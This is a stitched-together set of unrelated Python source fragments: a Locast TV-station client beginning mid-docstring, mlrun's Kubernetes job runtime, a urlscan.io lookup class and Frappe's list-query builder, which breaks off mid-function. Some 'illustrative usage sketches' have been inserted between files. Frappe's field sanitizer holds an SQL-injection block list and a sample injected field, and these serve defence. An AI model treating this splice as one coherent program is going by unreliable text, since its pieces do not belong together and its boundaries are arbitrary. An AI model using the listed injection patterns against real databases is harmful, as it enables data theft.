"""Set location data (lat, long, dma and city) based on the url that is passed in Args: url (str): Locast URL that is used to lookup a location Raises: LocationInvalidError: If the HTTP request fails or if the location is not found """ try: r = self.get(url) except HTTPError as err: raise LocationInvalidError(err) if r.status_code == 204: raise LocationInvalidError(f"Geo not found for {url}") geo = r.json() self.location = { 'latitude': geo['latitude'], 'longitude': geo['longitude']} self.dma = str(geo['DMA']) self.active = geo['active'] self.city = geo['name'] self.timezone = TimezoneFinder().timezone_at( lng=self.location['longitude'], lat=self.location['latitude']) def get_stations(self) -> list: """Get all station information and return in such a way that PMS can use it This is done by getting station information from locast.org and and where necessary complement channel numbers this with data from the FCC. Some locast stations already have the channel number (like 4.1 CBS) as part of the call sign, while others don't (like KUSDDT2). In this case we first split the call sign (KUSD) from the sub channel number (2) and lookup the channel number using the FCC facilities. FCC call signs can be in either the 'name' or 'callSign' property of a Locast station. Lastly, if we can't find a channel number, we just make something up, but this should rarely happen. 
Note: if caching is disabled, calling this method will lead to calling locast for channel information (incl EPG data) every time. Returns: list: stations """ if self.config.cache_stations: with self._channel_lock: return self._stations else: return self._get_stations() def _update_cache(self): """Update the station cache After this method is done fetching station information, it will schedule itself to run again after `self.config.cache_timeout` seconds.add() """ stations = self._get_stations() with self._channel_lock: self._stations = stations threading.Timer(self.config.cache_timeout, self._update_cache).start() def _get_stations(self) -> list: """Actual implementation of retrieving all station information Returns: list: stations """ self.log.info( f"Loading stations for {self.city} (cache: {self.config.cache_stations}, cache timeout: {self.config.cache_timeout}, days: {self.config.days})") stations = self._get_locast_stations() fake_channel = 1000 for station in stations: station['timezone'] = self.timezone station['city'] = self.city # See if station conforms to "X.Y Name" m = re.match(r'(\d+\.\d+) .+', station['callSign']) if m: station['channel'] = m.group(1) continue # Done with this station # Check if we can use the callSign or name to figure out the channel number # This is done by first detecting the call sign, station type and subchannel # and looking the channel number up from the FCC facilities result = (self._detect_callsign(station['name']) or self._detect_callsign(station['callSign'])) if result: # name or callSign match to a valid call sign (call_sign, subchannel) = result # Lookup the station from FCC facilities fcc_station = self._fcc_facilities.by_dma_and_call_sign( self.dma, call_sign) if fcc_station: station['channel'] = fcc_station["channel"] if fcc_station[ 'analog'] else f'{fcc_station["channel"]}.{subchannel or 1}' continue # Done with this sation # Can't find the channel number, so we make something up - This shouldn't really happen self.log.warning( f"Channel (name: {station['name']}, callSign: {station['callSign']}) not found. Assigning {fake_channel}") station['channel'] = str(fake_channel) fake_channel += 1 return stations def _get_locast_stations(self) -> list: """Get all the stations from locast for the current DMA Returns: list: Locast stations Raises: HTTPError: if the HTTP request to locast fails """ self._validate_token() start_time = datetime.utcnow().strftime("%Y-%m-%dT00:00:00-00:00") url = f'{STATIONS_URL}/{self.dma}?startTime={start_time}&hours={self.config.days * 24}' r = self.get(url, authenticated=True) return r.json() def _detect_callsign(self, input: str) -> Tuple[str, str]: """Detect a call sign and possibly subchannel from a string Args: input (str): String to find a callsign in Returns: Tuple[str, str]: tuple with callsign and subchannel None: in case no callsign was found """ m = re.match(r'^([KW][A-Z]{2,3})[A-Z]{0,2}(\d{0,2})$', input) if m: (call_sign, subchannel) = m.groups() return (call_sign, subchannel) return None def get_station_stream_uri(self, station_id: str) -> str: """Get the steam URL for a station. This always returns the URL with the highest resolution. 
Args: station_id (str): Locast station ID Returns: str: URL with the stream Raises: HTTPError: in case the request to locast.org fails """ self._validate_token() url = f'{WATCH_URL}/{station_id}/{self.location["latitude"]}/{self.location["longitude"]}' r = self.get(url, authenticated=True) # Stream URLs can either be just URLs or m3u8 playlists with multiple resolutions stream_url = r.json()["streamUrl"] m3u8_data = m3u8.load(stream_url) if len(m3u8_data.playlists) == 0: return stream_url # Sort the playlists by resolution and take the top best_resolution = sorted(m3u8_data.playlists, key=lambda pl: pl.stream_info.resolution).pop() return best_resolution.absolute_uri @classmethod def get(cls, url: str, authenticated=False, extra_headers={}): """Utility method for making HTTP GET requests. Note that Locast.token needs to be set when authenticated=True. Args: url (str): URL to get authenticated (bool, optional): Use an authenticated request. Defaults to False. extra_headers (dict, optional): Optional additional heades. Defaults to {}. Returns: [type]: [description] """ headers = { 'Content-Type': 'application/json', 'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" } headers.update(extra_headers) if authenticated: headers.update({'authorization': f'Bearer {cls.token}'}) r = requests.get(url, headers=headers) r.raise_for_status() return r
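# Illustrative usage sketch for LocastService above (added for clarity, not part
# of the original module). The Configuration object is assumed to carry the
# attributes the class reads (uid, cache_stations, cache_timeout, days); how it
# is constructed in locast2dvr is not shown here, and valid locast.org
# credentials are required for login.
def _example_locast_usage(config: Configuration):
    # login() is a class method, so a single login serves every LocastService instance.
    LocastService.login('user@example.com', 'secret')

    # Geo can be built from a zipcode, explicit coordinates, or left empty to
    # fall back to IP-based lookup.
    service = LocastService(config, Geo(zipcode='90210'))
    service.start()

    # Each station dict carries locast EPG data plus the derived channel number.
    for station in service.get_stations():
        print(station['channel'], station['callSign'])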
# Copyright 2018 Iguazio # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import time import typing from kubernetes import client from kubernetes.client.rest import ApiException import mlrun.api.schemas import mlrun.errors from mlrun.runtimes.base import BaseRuntimeHandler from ..builder import build_runtime from ..db import RunDBError from ..kfpops import build_op from ..model import RunObject from ..utils import get_in, logger from .base import RunError from .pod import KubeResource, kube_resource_spec_to_pod_spec from .utils import AsyncLogWriter class KubejobRuntime(KubeResource): kind = "job" _is_nested = True _is_remote = True @property def is_deployed(self): """check if the function is deployed (have a valid container)""" if self.spec.image: return True if self._is_remote_api(): db = self._get_db() try: db.get_builder_status(self, logs=False) except Exception: pass if self.spec.image: return True if self.status.state and self.status.state == "ready": return True return False def with_source_archive(self, source, pythonpath=None, pull_at_runtime=True): """load the code from git/tar/zip archive at runtime or build :param source: valid path to git, zip, or tar file, e.g. git://github.com/mlrun/something.git http://some/url/file.zip :param pythonpath: python search path relative to the archive root or absolute (e.g. './subdir') :param pull_at_runtime: load the archive into the container at job runtime vs on build/deploy """ self.spec.build.load_source_on_run = pull_at_runtime self.spec.build.source = source if pythonpath: self.spec.pythonpath = pythonpath def build_config( self, image="", base_image=None, commands: list = None, secret=None, source=None, extra=None, load_source_on_run=None, with_mlrun=None, auto_build=None, ): """specify builder configuration for the deploy operation :param image: target image name/path :param base_image: base image name/path :param commands: list of docker build (RUN) commands e.g. ['pip install pandas'] :param secret: k8s secret for accessing the docker registry :param source: source git/tar archive to load code from in to the context/workdir e.g. 
git://github.com/mlrun/something.git#development :param extra: extra Dockerfile lines :param load_source_on_run: load the archive code into the container at runtime vs at build time :param with_mlrun: add the current mlrun package to the container build :param auto_build: when set to True and the function require build it will be built on the first function run, use only if you dont plan on changing the build config between runs """ if image: self.spec.build.image = image if commands: if not isinstance(commands, list): raise ValueError("commands must be a string list") self.spec.build.commands = self.spec.build.commands or [] self.spec.build.commands += commands if extra: self.spec.build.extra = extra if secret: self.spec.build.secret = secret if base_image: self.spec.build.base_image = base_image if source: self.spec.build.source = source if load_source_on_run: self.spec.build.load_source_on_run = load_source_on_run if with_mlrun is not None: self.spec.build.with_mlrun = with_mlrun if auto_build: self.spec.build.auto_build = auto_build def deploy( self, watch=True, with_mlrun=None, skip_deployed=False, is_kfp=False, mlrun_version_specifier=None, builder_env: dict = None, ) -> bool: """deploy function, build container with dependencies :param watch: wait for the deploy to complete (and print build logs) :param with_mlrun: add the current mlrun package to the container build :param skip_deployed: skip the build if we already have an image for the function :param mlrun_version_specifier: which mlrun package version to include (if not current) :param builder_env: Kaniko builder pod env vars dict (for config/credentials) e.g. builder_env={"GIT_TOKEN": token} :return True if the function is ready (deployed) """ build = self.spec.build if with_mlrun is None: if build.with_mlrun is not None: with_mlrun = build.with_mlrun else: with_mlrun = build.base_image and not ( build.base_image.startswith("mlrun/") or "/mlrun/" in build.base_image ) if not build.source and not build.commands and not build.extra and with_mlrun: logger.info( "running build to add mlrun package, set " "with_mlrun=False to skip if its already in the image" ) self.status.state = "" # When we're in pipelines context we must watch otherwise the pipelines pod will exit before the operation # is actually done. 
(when a pipelines pod exits, the pipeline step marked as done) if is_kfp: watch = True if self._is_remote_api(): db = self._get_db() data = db.remote_builder( self, with_mlrun, mlrun_version_specifier, skip_deployed, builder_env=builder_env, ) self.status = data["data"].get("status", None) self.spec.image = get_in(data, "data.spec.image") ready = data.get("ready", False) if not ready: logger.info( f"Started building image: {data.get('data', {}).get('spec', {}).get('build', {}).get('image')}" ) if watch and not ready: state = self._build_watch(watch) ready = state == "ready" self.status.state = state else: self.save(versioned=False) ready = build_runtime( mlrun.api.schemas.AuthInfo(), self, with_mlrun, mlrun_version_specifier, skip_deployed, watch, ) self.save(versioned=False) if watch and not ready: raise mlrun.errors.MLRunRuntimeError("Deploy failed") return ready def _build_watch(self, watch=True, logs=True): db = self._get_db() offset = 0 try: text, _ = db.get_builder_status(self, 0, logs=logs) except RunDBError: raise ValueError("function or build process not found") if text: print(text) if watch: while self.status.state in ["pending", "running"]: offset += len(text) time.sleep(2) text, _ = db.get_builder_status(self, offset, logs=logs) if text: print(text, end="") return self.status.state def builder_status(self, watch=True, logs=True): if self._is_remote_api(): return self._build_watch(watch, logs) else: pod = self.status.build_pod if not self.status.state == "ready" and pod: k8s = self._get_k8s() status = k8s.get_pod_status(pod) if logs: if watch: status = k8s.watch(pod) else: resp = k8s.logs(pod) if resp: print(resp.encode()) if status == "succeeded": self.status.build_pod = None self.status.state = "ready" logger.info("build completed successfully") return "ready" if status in ["failed", "error"]: self.status.state = status logger.error(f" build {status}, watch the build pod logs: {pod}") return status logger.info(f"builder status is: {status}, wait for it to complete") return None def deploy_step( self, image=None, base_image=None, commands: list = None, secret_name="", with_mlrun=True, skip_deployed=False, ): function_name = self.metadata.name or "function" name = f"deploy_{function_name}" # mark that the function/image is built as part of the pipeline so other places # which use the function will grab the updated image/status self._build_in_pipeline = True return build_op( name, self, image=image, base_image=base_image, commands=commands, secret_name=secret_name, with_mlrun=with_mlrun, skip_deployed=skip_deployed, ) def _run(self, runobj: RunObject, execution): command, args, extra_env = self._get_cmd_args(runobj) if runobj.metadata.iteration: self.store_run(runobj) k8s = self._get_k8s() new_meta = self._get_meta(runobj) if self._secrets: if self._secrets.has_vault_source(): self._add_vault_params_to_spec(runobj) if self._secrets.has_azure_vault_source(): self._add_azure_vault_params_to_spec( self._secrets.get_azure_vault_k8s_secret() ) self._add_project_k8s_secrets_to_spec( self._secrets.get_k8s_secrets(), runobj ) else: self._add_project_k8s_secrets_to_spec(None, runobj) pod_spec = func_to_pod( self.full_image_path(), self, extra_env, command, args, self.spec.workdir ) pod = client.V1Pod(metadata=new_meta, spec=pod_spec) try: pod_name, namespace = k8s.create_pod(pod) except ApiException as exc: raise RunError(str(exc)) if pod_name and self.kfp: writer = AsyncLogWriter(self._db_conn, runobj) status = k8s.watch(pod_name, namespace, writer=writer) if status in ["failed", 
"error"]: raise RunError(f"pod exited with {status}, check logs") else: txt = f"Job is running in the background, pod: {pod_name}" logger.info(txt) runobj.status.status_text = txt return None def func_to_pod(image, runtime, extra_env, command, args, workdir): container = client.V1Container( name="base", image=image, env=extra_env + runtime.spec.env, command=[command], args=args, working_dir=workdir, image_pull_policy=runtime.spec.image_pull_policy, volume_mounts=runtime.spec.volume_mounts, resources=runtime.spec.resources, ) pod_spec = kube_resource_spec_to_pod_spec(runtime.spec, container) if runtime.spec.image_pull_secret: pod_spec.image_pull_secrets = [ client.V1LocalObjectReference(name=runtime.spec.image_pull_secret) ] return pod_spec class KubeRuntimeHandler(BaseRuntimeHandler): @staticmethod def _expect_pods_without_uid() -> bool: """ builder pods are handled as part of this runtime handler - they are not coupled to run object, therefore they don't have the uid in their labels """ return True @staticmethod def _are_resources_coupled_to_run_object() -> bool: return True @staticmethod def _get_object_label_selector(object_id: str) -> str: return f"mlrun/uid={object_id}" @staticmethod def _get_possible_mlrun_class_label_values() -> typing.List[str]: return ["build", "job"]
import requests from requests.exceptions import HTTPError, RequestException, Timeout from utils.termcolors import Termcolor as Tc class URLScan: def __init__(self, ip): self.headers = {"Accept": "application/json"} self.params = ( ("q", f"domain:{''.join(ip)}"), ("size", 1), ) self.base_url = "https://urlscan.io/api/v1/search/" def url_scan(self): try: resp = requests.get(self.base_url, headers=self.headers, params=self.params).json() except (HTTPError, RequestException, Timeout): print(f" {Tc.error}{Tc.dl_error} {Tc.gray}{Tc.rst}") except KeyError: print(f"{Tc.error} Issue encountered with query") else: if resp["results"]: for results in resp["results"]: for key, val in results["page"].items(): print(f"{key.title():12}: {val}") print(f"{'Result':12}: {results['result']}\n{'Screenshot':12}: {results['screenshot']}") else: print(Tc.clean)
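# Illustrative usage sketch for URLScan above (added for clarity, not part of
# the original module). The domain is a placeholder; urlscan.io's public search
# endpoint is queried without an API key, so live results may be rate limited.
if __name__ == "__main__":
    scanner = URLScan(["example.com"])
    scanner.url_scan()  # prints page details, result URL and screenshot per hit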
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: MIT. See LICENSE
"""build query for doclistview and return results"""
from typing import List

import frappe.defaults
from frappe.query_builder.utils import Column
import frappe.share
from frappe import _
import frappe.permissions
from datetime import datetime
import frappe, json, copy, re
from frappe.model import optional_fields
from frappe.model.utils.user_settings import get_user_settings, update_user_settings
from frappe.utils import flt, cint, get_time, make_filter_tuple, get_filter, add_to_date, cstr, get_timespan_date_range
from frappe.model.meta import get_table_columns
from frappe.core.doctype.server_script.server_script_utils import get_server_script_map


class DatabaseQuery(object):
	def __init__(self, doctype, user=None):
		self.doctype = doctype
		self.tables = []
		self.conditions = []
		self.or_conditions = []
		self.fields = None
		self.user = user or frappe.session.user
		self.ignore_ifnull = False
		self.flags = frappe._dict()
		self.reference_doctype = None

	def execute(self, fields=None, filters=None, or_filters=None,
		docstatus=None, group_by=None, order_by="KEEP_DEFAULT_ORDERING",
		limit_start=False, limit_page_length=None, as_list=False, with_childnames=False, debug=False,
		ignore_permissions=False, user=None, with_comment_count=False,
		join='left join', distinct=False, start=None, page_length=None, limit=None,
		ignore_ifnull=False, save_user_settings=False, save_user_settings_fields=False,
		update=None, add_total_row=None, user_settings=None, reference_doctype=None,
		run=True, strict=True, pluck=None, ignore_ddl=False, parent_doctype=None) -> List:

		if (
			not ignore_permissions
			and not frappe.has_permission(self.doctype, "select", user=user, parent_doctype=parent_doctype)
			and not frappe.has_permission(self.doctype, "read", user=user, parent_doctype=parent_doctype)
		):
			frappe.flags.error_message = _('Insufficient Permission for {0}').format(frappe.bold(self.doctype))
			raise frappe.PermissionError(self.doctype)

		# filters and fields swappable
		# its hard to remember what comes first
		if (
			isinstance(fields, dict)
			or (
				fields
				and isinstance(fields, list)
				and isinstance(fields[0], list)
			)
		):
			# if fields is given as dict/list of list, its probably filters
			filters, fields = fields, filters

		elif fields and isinstance(filters, list) \
			and len(filters) > 1 and isinstance(filters[0], str):
			# if `filters` is a list of strings, its probably fields
			filters, fields = fields, filters

		if fields:
			self.fields = fields
		else:
			self.fields = [f"`tab{self.doctype}`.`{pluck or 'name'}`"]

		if start: limit_start = start
		if page_length: limit_page_length = page_length
		if limit: limit_page_length = limit

		self.filters = filters or []
		self.or_filters = or_filters or []
		self.docstatus = docstatus or []
		self.group_by = group_by
		self.order_by = order_by
		self.limit_start = cint(limit_start)
		self.limit_page_length = cint(limit_page_length) if limit_page_length else None
		self.with_childnames = with_childnames
		self.debug = debug
		self.join = join
		self.distinct = distinct
		self.as_list = as_list
		self.ignore_ifnull = ignore_ifnull
		self.flags.ignore_permissions = ignore_permissions
		self.user = user or frappe.session.user
		self.update = update
		self.user_settings_fields = copy.deepcopy(self.fields)
		self.run = run
		self.strict = strict
		self.ignore_ddl = ignore_ddl

		# for contextual user permission check
		# to determine which user permission is applicable on link field of specific doctype
		self.reference_doctype = reference_doctype or self.doctype

		if user_settings:
			self.user_settings = json.loads(user_settings)

		self.columns = self.get_table_columns()

		# no table & ignore_ddl, return
		if not self.columns: return []

		result = self.build_and_run()

		if with_comment_count and not as_list and self.doctype:
			self.add_comment_count(result)

		if save_user_settings:
			self.save_user_settings_fields = save_user_settings_fields
			self.update_user_settings()

		if pluck:
			return [d[pluck] for d in result]

		return result

	def build_and_run(self):
		args = self.prepare_args()
		args.limit = self.add_limit()

		if args.conditions:
			args.conditions = "where " + args.conditions

		if self.distinct:
			args.fields = 'distinct ' + args.fields
			args.order_by = '' # TODO: recheck for alternative

		# Postgres requires any field that appears in the select clause to also
		# appear in the order by and group by clause
		if frappe.db.db_type == 'postgres' and args.order_by and args.group_by:
			args = self.prepare_select_args(args)

		query = """select %(fields)s from %(tables)s %(conditions)s %(group_by)s %(order_by)s %(limit)s""" % args

		return frappe.db.sql(query, as_dict=not self.as_list, debug=self.debug,
			update=self.update, ignore_ddl=self.ignore_ddl, run=self.run)

	def prepare_args(self):
		self.parse_args()
		self.sanitize_fields()
		self.extract_tables()
		self.set_optional_columns()
		self.build_conditions()

		args = frappe._dict()

		if self.with_childnames:
			for t in self.tables:
				if t != "`tab" + self.doctype + "`":
					self.fields.append(t + ".name as '%s:name'" % t[4:-1])

		# query dict
		args.tables = self.tables[0]

		# left join parent, child tables
		for child in self.tables[1:]:
			args.tables += f" {self.join} {child} on ({child}.parent = {self.tables[0]}.name)"

		if self.grouped_or_conditions:
			self.conditions.append(f"({' or '.join(self.grouped_or_conditions)})")

		args.conditions = ' and '.join(self.conditions)

		if self.or_conditions:
			args.conditions += (' or ' if args.conditions else "") + \
				' or '.join(self.or_conditions)

		self.set_field_tables()

		fields = []

		# Wrapping fields with grave quotes to allow support for sql keywords
		# TODO: Add support for wrapping fields with sql functions and distinct keyword
		for field in self.fields:
			stripped_field = field.strip().lower()
			skip_wrapping = any([
				stripped_field.startswith(("`", "*", '"', "'")),
				"(" in stripped_field,
				"distinct" in stripped_field,
			])
			if skip_wrapping:
				fields.append(field)
			elif "as" in field.lower().split(" "):
				col, _, new = field.split()
				fields.append(f"`{col}` as {new}")
			else:
				fields.append(f"`{field}`")

		args.fields = ", ".join(fields)

		self.set_order_by(args)

		self.validate_order_by_and_group_by(args.order_by)
		args.order_by = args.order_by and (" order by " + args.order_by) or ""

		self.validate_order_by_and_group_by(self.group_by)
		args.group_by = self.group_by and (" group by " + self.group_by) or ""

		return args

	def prepare_select_args(self, args):
		order_field = re.sub(r"\ order\ by\ |\ asc|\ ASC|\ desc|\ DESC", "", args.order_by)

		if order_field not in args.fields:
			extracted_column = order_column = order_field.replace("`", "")
			if "."
in extracted_column: extracted_column = extracted_column.split(".")[1] args.fields += f", MAX({extracted_column}) as `{order_column}`" args.order_by = args.order_by.replace(order_field, f"`{order_column}`") return args def parse_args(self): """Convert fields and filters from strings to list, dicts""" if isinstance(self.fields, str): if self.fields == "*": self.fields = ["*"] else: try: self.fields = json.loads(self.fields) except ValueError: self.fields = [f.strip() for f in self.fields.split(",")] # remove empty strings / nulls in fields self.fields = [f for f in self.fields if f] for filter_name in ["filters", "or_filters"]: filters = getattr(self, filter_name) if isinstance(filters, str): filters = json.loads(filters) if isinstance(filters, dict): fdict = filters filters = [] for key, value in fdict.items(): filters.append(make_filter_tuple(self.doctype, key, value)) setattr(self, filter_name, filters) def sanitize_fields(self): ''' regex : ^.*[,();].* purpose : The regex will look for malicious patterns like `,`, '(', ')', '@', ;' in each field which may leads to sql injection. example : field = "`DocType`.`issingle`, version()" As field contains `,` and mysql function `version()`, with the help of regex the system will filter out this field. ''' sub_query_regex = re.compile("^.*[,();@].*") blacklisted_keywords = ['select', 'create', 'insert', 'delete', 'drop', 'update', 'case', 'show'] blacklisted_functions = ['concat', 'concat_ws', 'if', 'ifnull', 'nullif', 'coalesce', 'connection_id', 'current_user', 'database', 'last_insert_id', 'session_user', 'system_user', 'user', 'version', 'global'] def _raise_exception(): frappe.throw(_('Use of sub-query or function is restricted'), frappe.DataError) def _is_query(field): if re.compile(r"^(select|delete|update|drop|create)\s").match(field): _raise_exception() elif re.compile(r"\s*[0-9a-zA-z]*\s*( from | group by | order by | where | join )").match(field): _raise_exception() for field in self.fields: if sub_query_regex.match(field): if any(keyword in field.lower().split() for keyword in blacklisted_keywords): _raise_exception() if any(f"({keyword}" in field.lower() for keyword in blacklisted_keywords): _raise_exception() if any(f"{keyword}(" in field.lower() for keyword in blacklisted_functions): _raise_exception() if '@' in field.lower(): # prevent access to global variables _raise_exception() if re.compile(r"[0-9a-zA-Z]+\s*'").match(field): _raise_exception() if re.compile(r"[0-9a-zA-Z]+\s*,").match(field): _raise_exception() _is_query(field) if self.strict: if re.compile(r".*/\*.*").match(field): frappe.throw(_('Illegal SQL Query')) if re.compile(r".*\s(union).*\s").match(field.lower()): frappe.throw(_('Illegal SQL Query')) def extract_tables(self): """extract tables from fields""" self.tables = [f"`tab{self.doctype}`"] sql_functions = [ "dayofyear(", "extract(", "locate(", "strpos(", "count(", "sum(", "avg(", ] # add tables from fields if self.fields: for field in self.fields: if not ("tab" in field and "." 
in field) or any(x for x in sql_functions if x in field): continue table_name = field.split('.')[0] if table_name.lower().startswith('group_concat('): table_name = table_name[13:] if table_name.lower().startswith('ifnull('): table_name = table_name[7:] if not table_name[0]=='`': table_name = f"`{table_name}`" if not table_name in self.tables: self.append_table(table_name) def append_table(self, table_name): self.tables.append(table_name) doctype = table_name[4:-1] ptype = 'select' if frappe.only_has_select_perm(doctype) else 'read' if not self.flags.ignore_permissions and \ not frappe.has_permission(doctype, ptype=ptype, parent_doctype=self.doctype): frappe.flags.error_message = _('Insufficient Permission for {0}').format(frappe.bold(doctype)) raise frappe.PermissionError(doctype) def set_field_tables(self): '''If there are more than one table, the fieldname must not be ambiguous. If the fieldname is not explicitly mentioned, set the default table''' def _in_standard_sql_methods(field): methods = ('count(', 'avg(', 'sum(', 'extract(', 'dayofyear(') return field.lower().startswith(methods) if len(self.tables) > 1: for idx, field in enumerate(self.fields): if '.' not in field and not _in_standard_sql_methods(field): self.fields[idx] = f"{self.tables[0]}.{field}" def get_table_columns(self): try: return get_table_columns(self.doctype) except frappe.db.TableMissingError: if self.ignore_ddl: return None else: raise def set_optional_columns(self): """Removes optional columns like `_user_tags`, `_comments` etc. if not in table""" # remove from fields to_remove = [] for fld in self.fields: for f in optional_fields: if f in fld and not f in self.columns: to_remove.append(fld) for fld in to_remove: del self.fields[self.fields.index(fld)] # remove from filters to_remove = [] for each in self.filters: if isinstance(each, str): each = [each] for element in each: if element in optional_fields and element not in self.columns: to_remove.append(each) for each in to_remove: if isinstance(self.filters, dict): del self.filters[each] else: self.filters.remove(each) def build_conditions(self): self.conditions = [] self.grouped_or_conditions = [] self.build_filter_conditions(self.filters, self.conditions) self.build_filter_conditions(self.or_filters, self.grouped_or_conditions) # match conditions if not self.flags.ignore_permissions: match_conditions = self.build_match_conditions() if match_conditions: self.conditions.append(f"({match_conditions})") def build_filter_conditions(self, filters, conditions, ignore_permissions=None): """build conditions from user filters""" if ignore_permissions is not None: self.flags.ignore_permissions = ignore_permissions if isinstance(filters, dict): filters = [filters] for f in filters: if isinstance(f, str): conditions.append(f) else: conditions.append(self.prepare_filter_condition(f)) def prepare_filter_condition(self, f): """Returns a filter condition in the format: ifnull(`tabDocType`.`fieldname`, fallback) operator "value" """ from frappe.boot import get_additional_filters_from_hooks additional_filters_config = get_additional_filters_from_hooks() f = get_filter(self.doctype, f, additional_filters_config) tname = ('`tab' + f.doctype + '`') if not tname in self.tables: self.append_table(tname) if 'ifnull(' in f.fieldname: column_name = f.fieldname else: column_name = f"{tname}.{f.fieldname}" can_be_null = True if f.operator.lower() in additional_filters_config: f.update(get_additional_filter_field(additional_filters_config, f, f.value)) # prepare in condition if 
f.operator.lower() in ('ancestors of', 'descendants of', 'not ancestors of', 'not descendants of'): values = f.value or '' # TODO: handle list and tuple # if not isinstance(values, (list, tuple)): # values = values.split(",") ref_doctype = f.doctype if frappe.get_meta(f.doctype).get_field(f.fieldname) is not None : ref_doctype = frappe.get_meta(f.doctype).get_field(f.fieldname).options result=[] lft, rgt = '', '' if f.value: lft, rgt = frappe.db.get_value(ref_doctype, f.value, ["lft", "rgt"]) # Get descendants elements of a DocType with a tree structure if f.operator.lower() in ('descendants of', 'not descendants of') : result = frappe.get_all(ref_doctype, filters={ 'lft': ['>', lft], 'rgt': ['<', rgt] }, order_by='`lft` ASC') else : # Get ancestor elements of a DocType with a tree structure result = frappe.get_all(ref_doctype, filters={ 'lft': ['<', lft], 'rgt': ['>', rgt] }, order_by='`lft` DESC') fallback = "''" value = [frappe.db.escape((v.name or '').strip(), percent=False) for v in result] if len(value): value = f"({", ".join(value)})" else: value = "('')" # changing operator to IN as the above code fetches all the parent / child values and convert into tuple # which can be directly used with IN operator to query. f.operator = 'not in' if f.operator.lower() in ('not ancestors of', 'not descendants of') else 'in' elif f.operator.lower() in ('in', 'not in'): values = f.value or '' if isinstance(values, str): values = values.split(",") fallback = "''" value = [frappe.db.escape((v or '').strip(), percent=False) for v in values] if len(value): value = f"({", ".join(value)})" else: value = "('')" else: df = frappe.get_meta(f.doctype).get("fields", {"fieldname": f.fieldname}) df = df[0] if df else None if df and df.fieldtype in ("Check", "Float", "Int", "Currency", "Percent"): can_be_null = False if f.operator.lower() in ('previous', 'next', 'timespan'): date_range = get_date_range(f.operator.lower(), f.value) f.operator = "Between" f.value = date_range fallback = "'0001-01-01 00:00:00'" if f.operator in ('>', '<') and (f.fieldname in ('creation', 'modified')): value = cstr(f.value) fallback = "'0001-01-01 00:00:00'" elif f.operator.lower() in ('between') and \ (f.fieldname in ('creation', 'modified') or (df and (df.fieldtype=="Date" or df.fieldtype=="Datetime"))): value = get_between_date_filter(f.value, df) fallback = "'0001-01-01 00:00:00'" elif f.operator.lower() == "is": if f.value == 'set': f.operator = '!=' elif f.value == 'not set': f.operator = '=' value = "" fallback = "''" can_be_null = True if 'ifnull' not in column_name: column_name = f'ifnull({column_name}, {fallback})' elif df and df.fieldtype=="Date": value = frappe.db.format_date(f.value) fallback = "'0001-01-01'" elif (df and df.fieldtype=="Datetime") or isinstance(f.value, datetime): value = frappe.db.format_datetime(f.value) fallback = "'0001-01-01 00:00:00'" elif df and df.fieldtype=="Time": value = get_time(f.value).strftime("%H:%M:%S.%f") fallback = "'00:00:00'" elif f.operator.lower() in ("like", "not like") or (isinstance(f.value, str) and (not df or df.fieldtype not in ["Float", "Int", "Currency", "Percent", "Check"])): value = "" if f.value is None else f.value fallback = "''" if f.operator.lower() in ("like", "not like") and isinstance(value, str): # because "like" uses backslash (\) for escaping value = value.replace("\\", "\\\\").replace("%", "%%") elif f.operator == '=' and df and df.fieldtype in ['Link', 'Data']: # TODO: Refactor if possible value = f.value or "''" fallback = "''" elif f.fieldname == 'name': 
value = f.value or "''" fallback = "''" else: value = flt(f.value) fallback = 0 if isinstance(f.value, Column): can_be_null = False # added to avoid the ifnull/coalesce addition quote = '"' if frappe.conf.db_type == 'postgres' else "`" value = f"{tname}.{quote}{f.value.name}{quote}" # escape value elif isinstance(value, str) and not f.operator.lower() == 'between': value = f"{frappe.db.escape(value, percent=False)}" if ( self.ignore_ifnull or not can_be_null or (f.value and f.operator.lower() in ('=', 'like')) or 'ifnull(' in column_name.lower() ): if f.operator.lower() == 'like' and frappe.conf.get('db_type') == 'postgres': f.operator = 'ilike' condition = f'{column_name} {f.operator} {value}' else: condition = f'ifnull({column_name}, {fallback}) {f.operator} {value}' return condition def build_match_conditions(self, as_condition=True): """add match conditions if applicable""" self.match_filters = [] self.match_conditions = [] only_if_shared = False if not self.user: self.user = frappe.session.user if not self.tables: self.extract_tables() meta = frappe.get_meta(self.doctype) role_permissions = frappe.permissions.get_role_permissions(meta, user=self.user) self.shared = frappe.share.get_shared(self.doctype, self.user) if ( not meta.istable and not (role_permissions.get("select") or role_permissions.get("read")) and not self.flags.ignore_permissions and not has_any_user_permission_for_doctype(self.doctype, self.user, self.reference_doctype) ): only_if_shared = True if not self.shared: frappe.throw(_("No permission to read {0}").format(self.doctype), frappe.PermissionError) else: self.conditions.append(self.get_share_condition()) else: # skip user perm check if owner constraint is required if requires_owner_constraint(role_permissions): self.match_conditions.append( f"`tab{self.doctype}`.`owner` = {frappe.db.escape(self.user, percent=False)}" ) # add user permission only if role has read perm elif role_permissions.get("read") or role_permissions.get("select"): # get user permissions user_permissions = frappe.permissions.get_user_permissions(self.user) self.add_user_permissions(user_permissions) if as_condition: conditions = "" if self.match_conditions: # will turn out like ((blog_post in (..) 
and blogger in (...)) or (blog_category in (...))) conditions = "((" + ") or (".join(self.match_conditions) + "))" doctype_conditions = self.get_permission_query_conditions() if doctype_conditions: conditions += (' and ' + doctype_conditions) if conditions else doctype_conditions # share is an OR condition, if there is a role permission if not only_if_shared and self.shared and conditions: conditions = f"({conditions}) or ({self.get_share_condition()})" return conditions else: return self.match_filters def get_share_condition(self): return f"`tab{self.doctype}`.name in ({", ".join(frappe.db.escape(s, percent=False) for s in self.shared)})" def add_user_permissions(self, user_permissions): meta = frappe.get_meta(self.doctype) doctype_link_fields = [] doctype_link_fields = meta.get_link_fields() # append current doctype with fieldname as 'name' as first link field doctype_link_fields.append(dict( options=self.doctype, fieldname='name', )) match_filters = {} match_conditions = [] for df in doctype_link_fields: if df.get('ignore_user_permissions'): continue user_permission_values = user_permissions.get(df.get('options'), {}) if user_permission_values: docs = [] if 